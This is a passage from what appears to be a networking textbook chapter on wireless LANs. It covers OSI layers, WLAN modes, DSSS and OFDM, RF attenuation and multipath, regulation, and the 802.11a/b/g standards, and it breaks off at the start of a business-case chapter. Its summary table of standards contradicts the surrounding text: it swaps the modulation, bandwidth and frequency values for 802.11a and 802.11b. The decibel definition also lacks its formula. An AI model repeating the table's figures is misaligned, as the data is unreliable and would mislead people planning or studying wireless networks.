WLANs adopt a star topology. However, star topologies provide singular and dedicated connectivity
between the stations and the central hub, which is not the case for WLANs. In WLANs, the transport
medium is shared among all connected stations. Hence, a distinction must be made between the
physical appearance of a star topology and the logical layout and behavior as a bus topology.
Data Encoding
Data encoding is the transformation of information into a form that is suitable for the transmission
medium. Adverse transmission effects such as attenuation, distortion, and interference are taken into
consideration when selecting an encoding method for a particular physical channel.
Attenuation is the loss of signal strength. This can be due to impurities of the transmission medium.
Copper has a natural resistance at room temperature. Similarly, fiber optic cables contain impurities that
reduce signal strength with distance. With regard to radio signals, one cause of loss of signal power is
materials that the signal encounters. The encountered materials cause absorption or reflection resulting
in a reduction of signal strength (see Figure 1-3). For example, water absorption bands are 22, 183, and
323 GHz, and the oxygen absorption regions are 60 and 118 GHz.
Figure 1-3. Attenuation of a Radio Signal
Another cause of attenuation of radio signals is the increasing volumetric spread of the signal as the
distance from the source increases. Incoherent electromagnetic wavesas opposed to coherent
electromagnetic waves such as laserslose signal focus in function of the distance traveled. The loss of
focus corresponds with a loss in power as the power is distributed over a greater area. This effect can
clearly be seen in flashlights. With constant power levels of the source, the beam's footprint increases
and the intensity of the light decreases the farther you are away from the source.
Distortion is the process of the physical medium influencing frequency components of the original signal
in different ways. The amount of resistance that a physical entity has on a signal medium is partly
determined by the frequency of the signal that passes through it. Different materials affect the RF signal
at different levels. The effect of lead versus glass on a low-frequency signal will be different from a highfrequency signal. The result is an undesirable change in the shape of the radio wave or distortion of the
signal that increases with transmission distance (see Figure 1-4).
Figure 1-4. Distortion of an RF Signal As It Passes Through Concrete
Note
Common definitions of the frequency band groups are low, high, and ultra-high. Low bands
range from 0 to 30 MHz, high bands from 100 to 300 MHz, and ultra-high bands from 300 MHz
to 3 GHz.
Interference occurs as a result of outside influences. In copper, inductive currents created by external
electromagnetic fields mutate the original signal's character. Sometimes referred to as noise, in RF,
interference is actually the disturbance of one radio signal by another of the same frequency. The
various transposed signals either boost or reduce frequency components of the original signal, leading to
modification of the original signal's profile. Figure 1-5 shows both the single undisturbed RF wave and
the RF wave when another is introduced. The second diagram shows that when the other wave is added,
it "interferes" with the original wave.
Figure 1-5. Interference of an RF Wave by a Second Signal
Data encoding techniques are used to construct a robust, reconstructable signal for the given medium.
The techniques not only define how digital information is encoded into and decoded from respective
electrical, optical, or radio signals, but also provide methods for error detection and correction.
Layer 2: Data Link Layer

The role of the data link layer is to provide reliable transit of data across a physical link. Specifications
define physical addressing, sequencing of frames, flow control, and error notification. Error notification
alerts upper-layer protocols that a transmission error has occurred. Sequencing of data frames reorders
frames that are received out of sequence. Finally, flow control moderates the transmission of data so
that the receiving device is not overwhelmed with more traffic than it can handle at any given time.
IEEE has subdivided the data link layer into two sublayers:
Logical Link Control (LLC)
Media Access Control (MAC)
Figure 1-6 illustrates the IEEE sublayers of the data link layer.
Figure 1-6. OSI Data Link Sublayers
The LLC sublayer manages communications between devices over a single link of a network. LLC is
defined in the IEEE 802.2 specification and supports both connectionless and connection-oriented
services used by higher-layer protocols. IEEE 802.2 defines a number of fields in data link layer frames
that enable multiple higher-layer protocols to share a single physical data link.
The MAC sublayer defines the contention resolution method for access to the physical medium. In
addition, the MAC specification defines MAC addresses that, at the data link layer, uniquely identify
devices.
The combination of Layer 1 and MAC specifications define the type of LAN network.
WAN standards are typically defined solely by their Layer 1 characteristics. The same is true for cellular
communications standards. For example, a T1/E1 network is defined by its underlying Layer 1 (physical)
network.
Figure 1-7 illustrates the OSI positioning of various common networking standards.
Figure 1-7. OSI Technology Reference Chart
Given the lesser importance of Layers 3 to 7 in the context of this book, a brief overview is provided for
the remaining OSI layers. Consult other books, such as the following, if you would like in-depth coverage
of these respective layers:
Internetworking with TCP/IP, Volume I: Principles, Protocols, and Architecture by Douglas E. Comer
TCP/IP Illustrated, Volume I: The Protocols by W. Richard Stevens
Layer 3: Network Layer

Layer 3 supports network addressing, route selection, congestion control, and packet fragmentation and
reassembly. IP is today's most commonly employed network layer protocol.
Layer 4: Transport Layer

The transport layer manages end-to-end connections over both connection-oriented and connectionless
links. In addition, its specification includes sequencing, flow control, and the capability for error-free
delivery. The Transport Control Protocol (TCP) is an example of a Layer 4 protocol used on the Internet.
Layer 5: Session Layer

The session layer establishes, manages, and terminates communication sessions. Communication
sessions consist of service requests and service responses that occur between applications located in
different network devices. This layer is typically not encountered in today's Internet environment.
However, protocols such as AppleTalk include session layer implementations.
Layer 6: Presentation Layer

The presentation layer ensures that information sent from one system is readable by the receiving
system. It employs coding and conversion schemes to provide common data representation formats and
conversion of character representation formats because systems may adopt different ways of
representing data. Examples of common data representation formats are ASCII and Extended BinaryCoded Decimal Interchange Code (EBCDIC). Finally, the presentation layer supplies common data
compression (MPEG, JPEG, GIF, TIFF) and common encryption schemes that enable data encrypted at
the source device to be properly deciphered at the destination.
Layer 7: Application Layer

The application layer interacts with software applications that require a communications component. As
such, its functions include defining syntax, identifying communication partners, determining resource
availability, and synchronizing communication.
Some commonly used programs fall outside the scope of the OSI model. For example, Microsoft Internet
Explorer does not fall within the OSI framework. The HTTP agent embedded in Explorer, however, does
form part of the OSI application layer.
A Brief History of WLANs

The value proposition of a network is that it ties together different entities and enables exchange of
information. The network's value is also directly related to its size. The more entities that are connected
and partake in the network, the higher the impact of the network is. For exchange and scaling to occur
in a relevant and orderly manner, the connected entities must use the same language. As such,
standards form an integral component of networks because they enforce order in a potentially very
chaotic world.
A good understanding of the differences between WLAN standards requires some background in Internet
standards as a whole. The Internet is the largest and most extensive network known today. Even though
the Internet does not have an owner in the strict sense of the word, organizations do exist that govern
standards for protocols, addressing, routing, and so on to ensure interoperability and the capability of
end-to-end information exchange.
One of these organizationsand probably the best knownis the Institute for Electrical and Electronics
Engineers (IEEE). This independent group of individuals, backed by companies, administers standards
for a myriad of technologies. For the sake of manageability, technology domains are broken into major
family groups to delimit and facilitate the process of the standards' development by special-purpose
working groups. A sample of technology domains and working groups is listed in Table 1-1.
Table 1-1. Sample of IEEE Working Groups

Technology Domain
Working Group
Broadcast Technology
Video Compression (Digital) Measurement (P1486)

Video Distribution and Processing (P205)
Components and Materials
Organic and Molecular Transistors and Materials

(P1620)
Nanotechnology (P1650)
Information Technology
Learning Technology (P1484)

Delay and Power Calculation (P1481)
Floating-Point Arithmetic (P754)
LAN/MAN (P802)
Public-Key Cryptography (P1363)
Technology Domain
Working Group
Software Engineering Standards
Standard Test Interface Language (P1450)
Storage Systems (P1244, P1563)
Power Electronics
Electronic Power Subsystems (P1515)

Power Electronics Module Interface (P1461)
A widely known group in the internetworking community is the IEEE 802 working group for LAN/MAN
technologies (P802). The P802 sets the standards for physical and data link layer protocols that are used
on the Internet. Some well-known standards established by this group include 802.2 (LLC), 802.3
(Ethernet), and 802.5 (Token Ring). WLANs are covered in the 802.11 standard. As such, it is common
to use the terms 802.11 and WLAN interchangeably when discussing the technology.
WLANs themselves date back to 1990 when the IEEE 802.11 working group first formed the standard.
The standard eventually became ratified in 1997 and specified a communications rate of 1 or 2 Mbps. As
this soon proved to offer insufficient throughput, 1999 saw the birth of a next-generation protocol that
addressed this limitation. This led to the 802.11b standard, which defines throughput speeds of up to 11
Mbps.
Ever-increasing demand for throughput prompted the IEEE to extend the 802.11 family even further. In
1999, the IEEE ratified the 802.11a protocol, which provides up to 54 Mbps of throughput. Most
recently, the 802.11g protocol, which also provides up to 54 Mbps of throughput, was ratified in 2003.
As technology continues to mature and evolve, the process of setting new standards for WLANs remains
an ongoing effort. Today, standards are being developed for WLANspecific components that cover
security, global compliance, and efficiency.
As WLAN devices began to proliferate in the open market, potential interoperability problems arose. A
group of companies formed the Wi-Fi Alliance in 1999 (originally called the Wireless Ethernet
Compatibility Alliance [WECA]) to mitigate the risk of losing momentum on WLAN adoption because of
these interoperability issues. This loose body of manufacturers brought together major industry players
to form a collective standard while working in parallel to the IEEE. The Alliance's main charter was to
define strict interoperability standards. This would enhance the user experience by guaranteeing the
capability for WLAN devices to work together in a plug-and-play fashion.
Since the late 1990s, WLANs have become one of the leading mobility technologies, with cellular phone
technologies being another. The ability to have access to digital information anytime and anywhere is
acting as the catalyst for the highly accelerated adoption of WLAN mobility technology. The growth trend
of WLANs' install-base is expected to continue well into the first decade of the twenty-first century with
market research firms projecting double-digit compounded annual growth rates (CAGRs). Innovative and
creative ways of leveraging WLAN mobility technology in both the business and personal arena will fuel
continued advancements not only from a technology perspective, but also from an application and
solution viewpoint. Mobility solutions and WLANs are here to stay.
How Wireless Networks Function

Like any other networking technology, a WLAN possesses a number of basic components and
characteristics. The most distinctive trait is that WLANs utilize radio channels as the physical transport
medium. This same basic radio technology, albeit in different frequency bands, is used by FM radio
stations to distribute audio content. The channels are slices of the radio spectrum that a
transmitter/receiver uses to send/receive a signal.
The fact that radio channels are employed as the transport medium has a specific set of implications.
This section discusses not only the components and characteristics, but also the implications of RF as a
transport medium. More precisely, you learn about the two different WLAN operating modes: ad-hoc and
infrastructure (also known as the base station model). The implications of fading, interference, and noise
are touched upon. Furthermore, techniques for efficient use of RF spectrum such as multiplex, duplex,
and multiple access technology in addition to the contention resolution mechanisms for acquiring an air
channel are covered. Finally, we close the introduction by providing a high-level overview of the
differences among current WLAN standards.
WLAN Modes
WLANs operate in two modes: ad-hoc and infrastructure. The modes define how the stations are related
to one another and how orderly communication takes place. The following sections contrast ad-hoc and
infrastructure modes in more detail.
Ad-Hoc Mode
The ad-hoc WLAN network is an unplanned, unmanaged peer-to-peer relationship. All nodes are
equivalents and can directly communicate with other nodes in their vicinity. They do not need to pass
through a central point of control. An ad-hoc network thus forms a fully meshed network that uses radio
as the interconnection system.
The network is a logical mesh. As mentioned earlier, WLANs physically adopt a bus topology with the
ether forming the backbone. This mesh should be thought of as a logical communications overlay. Figure
1-8 illustrates this any-toany relationship. The dotted lines depict the virtual interconnections that are
created by means of radio links.
Figure 1-8. Ad-Hoc WLAN Peer Relationships
Even though ad-hoc networks are created on the fly and adopt an any-to-any scheme, they still must
share a minimum set of common parameters such as the radio frequency, a common identifier setting,
and (if used) a common encryption method.
Infrastructure Mode
Infrastructure mode is the most common network type used today for enterprise solutions.
Fundamentally, this WLAN mode adopts a client/server model. The "clients" are devices with a WLAN
interface such as PCs, Personal Digital Assistants (PDAs), wireless IP phones, and many others. The
"server" in this case is the AP. Figure 1-9 illustrates the AP client relationship.
Figure 1-9. Infrastructure Mode WLAN
The logical topology versus physical topology differentiation is the same for ad-hoc mode as for
infrastructure mode. Even though Figure 1-9 would lead you to believe that in infrastructure mode,
WLAN adopts a star topology, it is in reality a physically collapsed bus topology. This is because the RF
medium forms a single Layer 2 collision domain. You can consider it to be equivalent to a traditional
coaxial Ethernet network where the electrical wire has been replaced by radio waves. In the perfect
environment, every station hears every transmission from every other station.
Because both Ethernet (802.3) and WLAN (802.11) use a bus topology, it is not surprising that they use
the same technique for determining accessibility to the physical medium. The method employed by
these types of networks is carrier sense multiple access (CSMA). There are, however, some subtle
differences to medium access control with regard to collision handling because of the RF medium.
Collisions occur when two stations inadvertently believe that the medium is available and both start
transmitting at the same time. When frames collide, data is lost. Neither frame is successfully received
and an orderly retransmit is required. Because there is no supervisory point of control, stations must
make up for this by using their own intelligence to secure the medium. Essentially, every station
effectively becomes its own traffic cop to manage the orderly access to the physical medium.
APs in infrastructure mode form the gateway for the client to the rest of the network. Indeed, all
communications must pass through the AP. As such, logical groups of stations are created that share a
gateway. This gateway or AP defines a standalone WLAN cell.
Note
The gateway can be physically implemented by a single or multiple APs.
In infrastructure mode, WLANs are comprised of cells. The technical name for a WLAN cell is Basic
Service Set (BSS) and has a distinctive identifier known as a Service Set Identifier (SSID). The SSID is
the common denominator that logically identifies WLAN cells. It effectively segments the ether through
the creation of a virtual Layer 2 network.
The WLAN cells can be extended or virtually combined when several BSS cells are in proximity of each
other. This is known as an Extended Service Set (ESS). The ESS extends the virtual Layer 2 network by
combining multiple BSSs into a singular larger network. Figure 1-10 shows the segmentation into the
logical groups of stations that form BSSs. It also illustrates the combination of multiple BSSs that forms
an ESS.
Figure 1-10. Basic Service Sets (BSS) and Extended Service Sets (ESS)
WLAN Technologies
When reviewing the basic setup of a WLAN, several challenges need to be resolved. These include the
following:
How multiple terminals share the air channel (multiple access technology)
How transmitting stations merge data (multiplexing)
How to share between up- and down-link (duplexing)
How access to the medium is controlled (access algorithm)
To obtain a better grasp of the meaning of these various technologies, the analogy of individuals using
cars to ship goods through a one-way tunnel is useful:
1. Multiple access determines how the cars form a sequence.

2. Multiplexing defines how the goods are loaded into the cars.
3. Duplexing is resolving the problem of two-way traffic through a one-way tunnel.
4. The access algorithm determines when it is safe for a car to enter the tunnel.
Figure 1-11 illustrates the relationship between the technologies and where they are relevant within a
WLAN.
Figure 1-11. WLAN Access Technologies
Multiple Access Technology

In the context of communications technologies, information can be distributed in both space and time.
You can multiplex information using coding, frequency, or time. The respective access methods are as
follows:
Code division multiple access (CDMA) In CDMA, the data is sliced into the encoding of the
signal. In this method, time and frequency stay constant. Figure 1-12 shows an example of a CDMA
network.
Figure 1-12. Code Division Multiple Access
Note
There are many encoding methods. Because of their complexity, this book does not cover
all of them. Simply speaking, however, encoding is the manner in which data is
transposed into a digital or analog signal for transmission over a Layer 1 medium.
Frequency division multiple access (FDMA) FDMA is the method of slicing data into separate
frequencies. In this case, time and coding are constant. Figure 1-13 shows an FDMA network.
Figure 1-13. Frequency Division Multiple Access
Time division multiple access (TDMA) TDMA slices data into separate slices of time, where
frequency and coding are constant. Figure 1-14 shows a TDMA network.
Figure 1-14. Time Division Multiple Access
Multiplex Technology
Transmitting stations use multiplex technology to merge data onto the air channel. Similar to access
technology, multiplexing can be done along code, frequency, and time dimensions.
In the case of WLAN technologies, an RF signal is sent using one of three modulation types:
Frequency Hopping Spread Spectrum (FHSS)
Direct Sequence Spread Spectrum (DSSS)
Orthogonal Frequency Division Multiplexing (OFDM)
FHSS is an obsolete technology and is not employed in any of today's WLAN implementations. As such,
we will look at DSSS and OFDM only.
DSSS
DSSS is an older and simpler to implementand hence more economical, method for RF modulation.
Signals are transmitted on a low-amplitude carrier wave (RF) across a wide band. This is done to combat
interference. DSSS defines a channel-to-channel separation of 5 MHz. However, each channel is 22 MHz
in width (11 MHz to the left and 11 MHz to the right). Because of this spreading, channels overlap into
each other, which inherently causes channel-to-channel interference.
There are only three channels in DSSS multiplexing that do not overlap with each other. These are
referred to as the transmit or non-overlapping channels and consist of channels 1, 6, and 11.
Figure 1-15 represents the 2.4 GHz Industrial, Scientific and Medical (ISM) band. Both IEEE 802.11b and
IEEE 802.11g operate in this band, specifically between 2.4 GHz and 2.4835 GHz.
Figure 1-15. Industrial, Scientific and Medical (ISM) Band

[View full size image]
OFDM
OFDM is more complex to implement because it uses narrow and precise RF waves. At 20 MHz, the
OFDM channel-to-channel separation is wider than that of DSSS modulation at 5-MHz separation. This
precise and focused channel spacing is key to the improved data rates that are possible with OFDM
multiplexing. To obtain an even higher data rate, each of the eight transmit channels is further divided
into 52 subchannels. As a result, there is more surface area to encode data.
Figure 1-16 shows the 5-GHz Unlicensed National Information Infrastructure (UNII) band. 802.11a
operates in this band, specifically those frequencies between 5.15 GHz and 5.350 GHz.
Figure 1-16. Unlicensed National Information Infrastructure (UNII) Band

Duplex Technology
Duplex technology is used to share the same space for an uplink and downlink. Two kinds of duplex
technology are relevant to WLANs:
Time division duplex Time division duplexing is the encoding of data over a slice of time in the
same frequency.
Frequency division duplex Frequency division duplexing is the encoding of data within a specific
subchannel of a frequency range.
Access Technology
Access technology defines which WLAN node can take control of the RF spectrum and how. Although
similar to the access method in other IEEE 802 standards, WLANs employ carrier sense multiple
access/collision avoidance (CSMA/CA) technology. The defining feature in WLAN is collision avoidance.
WLANs use open air, which is borderless, as opposed to other IEEE 802 forms where the transport
medium is bounded. In WLANs, detecting whether the medium is busy is nearly impossible. Stations
must counter this problem by utilizing acknowledgements to determine when the medium is in use
before transmitting their datahence the name collision avoidance.
WLAN Radio Communications

This section describes the role and framework of WLAN radio frequencies. WLANs have two specific slices
of the RF spectrum: 2.4 GHz and 5 GHz. These frequency bands are unlicensed bands that can be used
freely without registration or financial obligation.
With their increasing popularity, the use of vast amounts of WLAN devices in these bands has changed
access to the airspace from free into a free-for-all. Because the spectrum is unregulated, the possibility
of an excessive number of devices in each other's vicinity exists. Indeed, the compounding of the RF
interference problem in combination with the massive contention for access to the ether can saturate the
frequency range to a point where no successful communication is possible. In this case, the system
simply "collapses." This adverse situation must therefore be preempted and addressed.
Characteristics That Influence WLAN Bandwidth

Various characteristics that are specific to a WLAN can influence the actual throughput that can be
achieved. These elements include the modulation technique used, the power of the radio signal, and
environmental effects such as attenuation and multipath effects. Each will now be discussed in more
detail.
Modulation
Modulation is the process of overlaying a content signal on a carrier signal. The overlaying can be done
in terms of amplitude, frequency, or phase. Generally there are three forms of digital modulation:
Amplitude shifting The change in the strength of an RF signal or amplitude signals a binary flip.
Frequency shifting The signal sent over a different frequency signals a binary flip.
Phase shifting An offset of the phase or timing of a radio wave signals a binary flip.
As a rule, the more complex the algorithm, the higher the data rate.
Path Loss, Power, and Antennas

In a perfect environment, the distance that an RF wave will travel is dependent on its frequency and
amplitude. However, in a real-world deployment, physical variables such as walls and people have a
further impact on path loss. This path loss includes the following:
Transmitter power The amount of power that the station uses to transmit a signal.
Transmitter and receiver antenna gain A measurement in the increase of the radio signal,
measured as dB or dBi.
Transmitter and receiver cable losses The loss of signal strength (attenuation) that occurs as a
signal passes through a length of copper cable or connector.
Receiver sensitivity The amount of signal loss as a result of the receiver being able to interpret a
signal, measured in dBi.
Noise and interference Other RF signals that exist in the area of an AP or Client and that
adversely influence the original signal.
Note
The decibel (dB) is not a unit in the sense that a meter or an ampere is. Feet and
amperes are defined quantities of distance and electrical current. A decibel is a
relationship between two values of power. A decibel (dB) is defined as follows:
A decibel intends to facilitate the comparison of power levels that are orders of magnitude
different. In the context of radio signals, the decibel typically represents a signal-to-noise
ratio.
Power and antenna gain have the most direct effect on signal amplitude. Within the standards for each
protocol, as governed by regional regulatory bodies, there are defined limits on the transmit power and
antenna use. These limitations directly influence the maximum reach of WLANs.
Generally speaking, antenna gain is measured in dBi (isotropic), which is based on a "theoretical
antenna." This provides a constant baseline.
Note
An isotropic antenna is a theoretical concept. If it existed, the signal would radiate in all
directions from the antenna, forming a perfect circle.
Attenuation, Distortion, and Interference

Another important aspect in WLANs is the environment and how it affects radio waves. Because a myriad
of environmental elements influence a radio wave, the wave's actual behavior is exceedingly hard to
predict deterministically. For example, RF absorption by objects reduces the strength of the signal. In a
crowded office, radio transmissions are dampened as they pass through walls, desks, and even people.
This is not the case in an open warehouse. Similarly, a functioning microwave oven emits radio waves
that might interfere with WLAN signals, especially when in close proximity to any WLAN device.
Multipath
Radio waves have no boundaries and "bounce" around. This causes an effect known as multipath. The
reflection of waves causes them to be received not only multiple times by stations but also at different
intervals. Radio receivers need to be able to extract the correct signal from these disparate ones and
ferret out the good from the bad.
Figure 1-17 illustrates how the ricochet effect of radio waves off objects leads to the multipath effect.
Several signals with the same data are sent from the AP into free space, which then "ricochet" in many
different directions off different walls (boundaries). The client receives each signal at different times.
Figure 1-17. Multipath Effect
WLAN device manufacturers integrate specific components into their products to deal with multipath.
This is implemented in both hardware and software.

Special or customized antennas can also be used to combat the adverse effect of multipath. Directional
antennas focus signals and hence counteract the general effects of multipath. Additionally, the radio
receiver can accomodate for multipath by reacting to "delay spread" and rejecting duplication of already
received signals.
Combating External Effects

All the negative impacts discussed thus far have a direct influence on the relative throughput of a WLAN.
For a WLAN to be able to send data, it must accommodate changes incurred from these detrimental
factors.
To effectively cope with all the adverse external effects, WLANs have adopted a self-throttling
throughput strategy. As the strength and quality of a signal diminishes, a WLAN will automatically gear
down to adjust to a lower throughput rate. The opposite is also true. As the signal's quality increases,
the data rate rises.
What we have alluded to is that the defined data rates for each standard actually represent a nominal
theoretical boundary. In a perfect scenario, these nominal maxima could be met. However, the reality is
that interference, internal radio signaling, antenna type, atmospheric conditions, noise, attenuation, and
other influences have a role in determining the real throughput. Actual usable throughput is generally
about half of the theoretical rates. For example, in an 802.11b network, the theoretical data rate of 11
Mbps is reduced to an actual usable rate of around 6 Mbps. The same effect of stated to actual data
rates applies to 802.11g and 802.11a.
No magic formula enables the actual throughput to be predetermined because the factors that influence
the real throughput are many and diverse.
Regulatory Requirements
As you have learned, the radio spectrum is at the heart of any wireless network. Because RF devices are
used in many critical day-to-day applications, they have become heavily regulated. Police, fire, and air
traffic control systems use RF in some form. The regulations are in place to ensure that communications
can coexist and occur in a deterministic and orderly fashion. For example, the police can be notified of a
bank robbery and airplanes can communicate consistently with air traffic control.
Regulations surrounding RF are managed by both national and regional bodies. Significant disparities can
exist between respective local regulations. Awareness of potential differences in RF regulations is the
first step to complying with them. The second step is knowing which regulatory bodies are relevant in
your specific case and where to consult upon them.
A sample of the most important regulatory bodies includes
U.S. Federal Communication Commission (FCC)
European Telecommunications Standards Institute (ETSI)
Industry Canada (IC)
China Wireless Telecommunication Standard group (CWTS)

Japan's Telecom Engineering Center (TELEC)
Note
Note that this list is far from exhaustive. Contact your local government to assist you in
identifying your appropriate regulatory bodies.
Each regulatory body defines the specific use or constraint on the use of ISM and UNII radio frequencies.
Local authorities define which parts of the spectrum are permitted for use, the power levels that can be
emitted by the radio, and allowances surrounding approved commercial and consumer use.
Vendors of WLAN devices almost always consider local regulations when developing products. However,
WLAN equipment that is compliant for one region does not implicitly translate into compliance for other
regions. As such, geographical portability of the WLAN devices is not guaranteed from a regulatory point
of view. When planning a WLAN deployment across multiple countries, ensure that the selected
equipment has been approved for each location.
Additional concerns related to RF are the open availability of the unlicensed bands and their potential
overuse. Because these frequency ranges are unlicensed, many devices can coexist and potentially
compound interference problems.
Different WLAN Standards

The IEEE 802.11 WLAN standard contains a number of subsets that can potentially lead to confusion.
Indeed, the 802.11 substandards have resulted in the creation of an alphabet soup. This section brings
order to this situation and expands upon some of the more subtle differences between the various WLAN
standards. The IEEE standards that are covered are 802.11b, 802.11g, and 802.11a.
Because the respective standards were developed and ratified at different points in time, WLAN
equipment manufacturers have also produced hybrid devices that are capable of spanning multiple
standards. These are the so-called dual-band devices.
802.11b
IEEE 802.11b is the most commonly known WLAN standard. At the time of writing of this book, 802.11b
WLANs enjoy the highest market adoption. The standard has three main characteristics:
DSSS is used for modulation.
The frequency range is 2.4 GHz.
The maximum data rate is 11 Mbps, although the actual throughput is 5 to 6 Mbps.
Because DSSS is a simpler technology to implement in siliconas opposed to softwareit greatly
accelerated the 802.11b technology's time to market. However, the simplicity of implementation comes
at the cost of efficiency. Early deployments of WLANs were small and primarily used as secondary means
for network connectivity. In such an environment, the maximum bandwidth of 11 Mbps was all that was
needed, and it served these networks well.
The four respective data rates that are employed by 802.11b are 1 Mbps, 2 Mbps, 5.5 Mbps, and 11
Mbps. The effective range goes from 0 to 100 meters. The relationship between nominal throughput and
transmission distance is illustrated in Figure 1-18.
Figure 1-18. 802.11b Range Versus Throughput
802.11g
IEEE 802.11g is a hybrid implementation of WLAN technology. The following are its key characteristics:
Both DSSS and OFDM are used for modulation in function of the desired data rate.
The frequency range is 2.4 GHz.
The maximum data rate is 54 Mbps.
The higher data rate and backward compatibility with 802.11b are making IEEE 802.11g the protocol of
choice to displace 802.11b. 802.11g operates in the 2.4-GHz frequency range and can employ DSSS,
thus facilitating backward compatibility with 802.11b in the lower throughput range. However, 802.11g
employs OFDM for data rates above 11 Mbps as opposed to DSSs for data rates below 11 Mbps. OFDM is
more efficient than DSSS but also more complex to implement, hence the later time to market and
higher initial pricing for 802.11g.
Note
The frequency band alone does not guarantee compatibility with 802.11b. Other components
such as the same modulation and multiplexing techniques are also required for compatibility.
For example, 802.11g makes use of DSSS when operating at speeds up to 11 Mbps and
switches to OFDM for higher data rates.
Every benefit has a consequence, and the same is true for the backward compatibility of 802.11g with
802.11b. A mixed environment results in lower effective data rates for 802.11g because the different
multiplexing methods impact the timing of the data transmission and reception. 802.11b packets are
sent out with longer interval times as opposed to 802.11g stations. As a result, 802.11g stations throttle
down by extending their transmit wait timers so that they do not drown out 802.11b stations.
Just like 802.11b, 802.11g is limited by power output constraints, governed by local or regional
governments. However, the tighter timing of OFDM enables data rates of up to 54 Mbps in the same
frequency band and power level. The 12 respective data rates that are employed by 802.11g are 1
Mbps, 2 Mbps, 5.5 Mbps, 6 Mbps, 9 Mbps, 11 Mbps, 12 Mbps, 18 Mbps, 24 Mbps, 36 Mbps, 48 Mbps,
and 54 Mbps. The effective range goes from 0 to 100 meters. The relationship between nominal
throughput and transmission distance is illustrated in Figure 1-19.
Figure 1-19. 802.11g Range Versus Throughput
802.11a
Contrary to common belief, the IEEE 802.11a standard is not new to WLAN space, having been ratified
in 1999. The three key characteristics of 802.11a are as follows:
OFDM is used for modulation.
The frequency band is 5 GHz.
The maximum data rate is 54 Mbps.
Another important aspect of 802.11a is that it has eight non-overlapping channels to transmit on, as
opposed to the three in 802.11b/g. This higher number of transmit channels allows for more active
sessions. Indeed, the increased number of channels allows more stations to transmit in a given space.
This is basically equivalent to adding lanes to a highway. The relationship between nominal throughput
and transmission distance for 802.11a is illustrated in Figure 1-20.
Figure 1-20. 802.11a Range Versus Throughput
The drawback to working in the 5-GHz range is that the radios are more sensitive to environmental
conditions. 802.11a has had initial barriers to overcome, namely with price and performance, which
probably explain the lower adoption rates. Finally, when you consider that the new 802.11g standard
offers comparable speeds and has the significant added benefit of backwards compatibility with 802.11b,
it is not surprising that 802.11a faces this higher barrier to entry.
Table 1-2 provides a brief summary of the key differences between 802.11a, 802.11b, and 802.11g.
Table 1-2. WLAN Standards
IEEE Name
Frequency
Modulation
Type
Native
Bandwidth
Additional Speeds
Supported (Mbps)
802.11a
5.7 GHz
DSSS
11 Mbps
48, 36, 24, 18, 12, 9, 6
802.11b
2.4 GHz
OFDM
54 Mbps
5.5, 2, 1
802.11g
2.4 GHz
OFDM
54 Mbps
48, 36, 24, 18, 12, 9, 6
Coexistence
802.11a uses a completely different frequency range from 802.11b and 802.11g. If you install 802.11a
APs, you must ensure that you have 802.11a clients. In most cases, both infrastructure providers and
client radio manufacturers build multiradio products.
Both 802.11a and 802.11h use the 5-GHz range and are designed to coexist. 802.11h complements
802.11a so that stations in this band can operate worldwide. If you have an 802.11a network, you don't
need 802.11h. Conversely, if you have an 802.11h network, you already have 802.11a without
performance or quality issues.
Note
802.11h is an IEEE standard that addresses certain power and channel issues that exist in
Europe.
Additional 802.11 Standards

You have examined the three LAN standards that define WLANs. However, as the requirements for
interoperability, support for regional regulatory requirements, improved security, and other
enhancements have evolved, the original IEEE 802.11 working groups have been extended. Many new
standards have been defined or are currently under development. This is the cause of much additional
confusion. Not only do you need to be familiar with the three WLAN standards (802.11b, 802.11a, and
802.11g), but you also need to deal with an additional raft of new standards. Indeed, more letters have
been added to the alphabet soup.
It is important to note that the 802.11 standards are constantly evolving. Because the IEEE works
through discussion and democratic voting, the process of ratifying a new standard can be lengthy. Many
of the current 802.11 standards are therefore still under development. However, this does not stop
eager manufacturers from sometimes releasing products that are in a "preratification" state as an
attempt to beat their competitors to market. 802.11g is a prime example. Many 802.11g products were
released before the standard was put to vote. For the most part, manufacturers will develop their
products with the intention of embracing the ratified standard later on. Nevertheless, there are those
who will use their current product as a stepping stone for the next standard. We go into further detail in
Appendix A, "Wireless LAN Standards Reference."
Note
As part of the ratification process, no one company or individual is allowed to have an
advantage over another. This becomes an additional sticking point and sometimes further bogs
down process.
Summary
This chapter introduced the value of mobility in today's information-driven society. The desire for access
to information anywhere and anytime has been and will continue to be a key driver for wireless
communications technologies in both the business and personal arena. This chapter provided a
structured approach to understanding WLANs from a technological point of view by introducing the OSI
framework. The framework not only helps you understand how WLANs position themselves next to other
internetworking technologies, but also aids the introduction of key technical aspects that are specific to
WLANs. Key components such as multiaccess, multiplex, duplex, and access technologies were touched
upon. In addition, the impact of internal and environmental effects such as power, attenuation,
distortion, and noise on actual WLAN throughputs was discussed. Finally, this chapter untangled the
IEEE 802.11 alphabet soup by providing a high-level overview of the main substandards and their
respective differences.
Endnotes
1. Negroponte, Nicholas. Being Digital. Vintage Press, 1995.
2. Christensen, Clayton M. The Innovator's Dilemma. HarperBusiness, 2000.
Chapter 2. Business Considerations
The 1990s were characterized by an IT investment frenzy. Everybody wanted to jump onto the Internet
bandwagon. Little effort was expended on analyzing and justifying the IT investment requirements and
benefits.
The bursting of the Internet bubble not only resulted in a myriad of failed businesses and large monetary
losses but also led to a renewed emphasis on scrutiny and accountability when making investments in
IT. Indeed, in many organizations, today's IT investments are not made at the discretion of the CIO or
CTO. The CFO is a key participant in the decision-making process for allocating the organization's funds
to IT. As a result, the need for a clear, concise, and robust IT business case has become imperative.
A term that is often used interchangeably or in conjunction with business case is return on investment
(ROI). However, these two terms do not necessarily denote the same thing. In fact, ROI is only a subset
of a business case and focuses exclusively on the financial ramifications of an investment.
ROI is often erroneously considered to be the silver-bullet metric that will ensure that the IT purchase
will be beneficial to the organization. As you will see in this chapter, ROI has benefits and pitfalls. An ROI
analysis is something senior management understands, and it instills rationality and standardization in
the IT decision-making process. However, because the strategic impact of IT investments is next to
impossible to quantify, ROI does not provide a vehicle for capturing these benefits. Furthermore,
elements such as the risk associated with the investment and the time value of money are not accounted
for by plain-vanilla ROI analysis. The specific benefits and pitfalls of ROI will be covered in greater detail
later in this chapter.
The goal of a business casefor WLANs or for other assetsis to provide a holistic cost justification. This
chapter demystifies the process of developing an exhaustive and vigorous business case for WLANs in
your organization. It also provides frameworks for tackling the challenge of business-technology
alignment and identification of opportune application points for WLANs within the organizational
ecosystem. Quantitative, qualitative, and risk considerations are covered to provide an exhaustive view.
Finally, given the importance of economic returns, the most common financial barometers including ROI,
